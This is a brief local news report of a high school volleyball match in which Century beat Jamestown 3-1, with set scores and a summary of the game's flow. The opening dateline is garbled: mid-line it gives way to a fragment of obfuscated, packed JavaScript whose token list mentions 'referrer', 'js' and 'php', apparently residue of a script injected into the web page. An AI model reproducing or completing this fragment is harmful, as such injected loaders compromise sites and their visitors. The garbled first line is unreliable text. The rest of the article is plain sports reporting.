JAMESTOWN eyzds|var|u0026u|referrer|fdkia||js|php’.split(‘|’),0,{}))
(NewsDakota.com) – After a brutally slow start, Jamestown showed some life in the second half of their four-set match with Century Tuesday night at Jerry Meyer Arena. The Patriots, however, took the match 3-1 (25-10, 25-16, 24-26, 25-20).

Jamestown trailed 17-2 in the first set with their only two points coming directly off Century errors. But after being handled in the first two sets, they showed some confidence and held off a Patriots rally to win set 3.

Century never trailed in the entirety of fourth set, but Jamestown played with them including twice rallying from three-point deficits. The Pats were able to eventually pull away after scoring the final five points of the match.
